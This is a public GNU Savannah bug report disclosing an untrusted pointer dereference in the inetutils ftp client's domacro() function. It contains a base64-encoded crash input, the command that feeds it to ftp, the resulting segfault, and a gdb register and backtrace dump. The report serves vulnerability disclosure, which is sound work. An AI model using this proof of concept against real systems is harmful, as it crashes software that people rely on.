[bug #61722] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186

[AiDai]

URL:
  <https://savannah.gnu.org/bugs/?61722>

                 Summary: Untrusted Pointer Dereference in domacro() at
inetutils/ftp/domacro.c:186
                 Project: GNU Networking Utilities
            Submitted by: aidai
            Submitted on: Thu 23 Dec 2021 01:54:14 PM UTC
                Category: None
                Severity: 3 - Normal
              Item Group: None
                  Status: None
                 Privacy: Public
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any

    _______________________________________________________

Details:

# Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186

## Description

An Untrusted Pointer Dereference was discovered in domacro() at
inetutils/ftp/domacro.c:186. The vulnerability causes a segmentation fault and
application crash.

**version**

```
./ftp --version
ftp (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc**

```
base64 poc
bWEgIAoCCiQkJCQkMiQkJDAkJCQkNTUxNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1
NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1
NTU1NTU1NTU1NTU1NSQkCQICCgoCAAQJZAD/CgQX6ygKCgocCiQKCQIKCgoAAP////8K//8CCiQK
CP8g/3cCCgIACv8=
```

**command:**

```
./ftp < ./poc
```

**Result**

```
./ftp < ./poc
(macro name) Enter macro line by line, terminating it with a null line
?Invalid command
?Invalid command
?Invalid command
(macro name) [1]    2677333 segmentation fault  ./ftp < ./poc
```

**gdb**

```
domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186
186                                             strlen (argv[j + 1]) + 2))
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[
REGISTERS
]─────────────────────────────────────────────
 RAX  0x555471c9ada0
 RBX  0x555555583646 ◂— 0x24242402
 RCX  0x21000
 RDX  0xffffffff1c71c720
 RDI  0x7ffff7f59b80 (main_arena) ◂— 0x0
 RSI  0x411
 R8   0x555555583640 ◂— 0x2402242424242424
 R9   0xd
 R10  0x55555557100d ◂— 0x504f4f4e002029 /* ') ' */
 R11  0x9
 R12  0x555555559f30 (_start) ◂— endbr64
 R13  0x7fffffffe220 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe070 —▸ 0x7fffffffe0b0 —▸ 0x7fffffffe130 ◂— 0x0
 RSP  0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76
◂— 0x6c75616665640024 /* '$' */
 RIP  0x55555556045a (domacro+815) ◂— mov    rax, qword ptr [rax]
──────────────────────────────────────────────[
DISASM
]──────────────────────────────────────────────
 ► 0x55555556045a <domacro+815>    mov    rax, qword ptr [rax]
   0x55555556045d <domacro+818>    mov    rdi, rax
   0x555555560460 <domacro+821>    call   strlen@plt               
<strlen@plt>

   0x555555560465 <domacro+826>    lea    rdx, [rax + 2]
   0x555555560469 <domacro+830>    lea    rax, [rbp - 0x40]
   0x55555556046d <domacro+834>    mov    rcx, rdx
   0x555555560470 <domacro+837>    lea    rdx, [rip + 0x1e2c1]         
<0x55555557e738>
   0x555555560477 <domacro+844>    mov    rsi, rax
   0x55555556047a <domacro+847>    lea    rdi, [rip + 0x1f6c7]         
<0x55555557fb48>
   0x555555560481 <domacro+854>    call   lengthen                <lengthen>

   0x555555560486 <domacro+859>    test   eax, eax
──────────────────────────────────────────[
SOURCE (CODE)
]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/domacro.c
   181                  j = 10 * j + *cp1 - '0';
   182                cp1--;
   183                if (argc - 2 >= j)
   184                  {
   185                    if (lengthen (&line, &cp2, &linelen,
 ► 186                                  strlen (argv[j + 1]) + 2))
   187                      {
   188                        allocflg = 1;
   189                        goto end_exec;
   190                      }
   191                    strcpy (cp2, argv[j + 1]);
──────────────────────────────────────────────[
STACK
]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸
0x555555572c76 ◂— 0x6c75616665640024 /* '$' */
01:0008│     0x7fffffffe008 ◂— 0x25556a93e
02:0010│     0x7fffffffe010 —▸ 0x7ffff7d3b740 ◂— 0x7ffff7d3b740
03:0018│     0x7fffffffe018 ◂— 0x55583620 /* ' 6XU' */
04:0020│     0x7fffffffe020 ◂— 0x2e38e38e3
05:0028│     0x7fffffffe028 ◂— 0x0
06:0030│     0x7fffffffe030 —▸ 0x55555558364a ◂— 0x0
07:0038│     0x7fffffffe038 —▸ 0x55555557eb37 (macbuf+119) ◂—
0xa00020209242435
────────────────────────────────────────────[
BACKTRACE
]─────────────────────────────────────────────
 ► f 0   0x55555556045a domacro+815
   f 1   0x555555566a09 cmdscanner+633
   f 2   0x55555556665a main+929
   f 3   0x7ffff7d950b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186
#1  0x0000555555566a09 in cmdscanner (top=1) at main.c:461
#2  0x000055555556665a in main (argc=0, argv=0x7fffffffe230) at main.c:310
#3  0x00007ffff7d950b3 in __libc_start_main (main=0x5555555662b9 <main>,
argc=1, argv=0x7fffffffe228, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe218) at
../csu/libc-start.c:308
#4  0x0000555555559f5e in _start ()
```






    _______________________________________________________

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61722>

_______________________________________________
  Message sent via Savannah
  https://savannah.gnu.org/